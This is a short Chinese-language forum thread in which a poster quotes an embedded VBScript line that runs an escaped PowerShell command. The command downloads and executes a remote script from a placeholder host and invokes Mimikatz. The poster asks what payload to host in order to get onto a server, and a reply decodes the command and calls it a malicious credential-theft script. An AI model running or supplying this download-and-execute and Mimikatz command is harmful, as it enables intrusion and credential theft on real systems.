E盾0day的问题

樱花落满地 · 发表于 2026-2-28 19:03

最近找0day的时候发现了这行代码", "123456@qq.com", "", ""
Set obj = createobject("wscript.shell")
obj.run(unescape("cmd.exe%20%2Fc%20powershell%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A%2F%2F127.0.0.1%2F123.txt%27%29%3B%20Invoke-Mimikatz"))
MyMail.MailFromTo "

请问一下123.txt里面应该放什么内容，才能实现0day上服务器。

小飞飞象 · 发表于 2026-2-28 20:49

本帖最后由小飞飞象于 2026-2-28 20:51 编辑

核心编码字符串解码后为：cmd.exe /c powershell IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/123.txt'); Invoke-Mimikatz；
代码功能是通过 VBScript 调用 cmd 执行 PowerShell，下载并执行远程脚本，同时调用 Mimikatz 提取系统凭据；
该代码属于高风险恶意脚本，非授权场景下使用 / 运行均违反安全规范。那要看对方服务器有什么漏洞，用的什么防火墙，什么杀毒！这得有很深的网络安全技术，或有直接扫漏洞GET Webshell的安全监测软件！

		自动登录	找回密码
密码			立即注册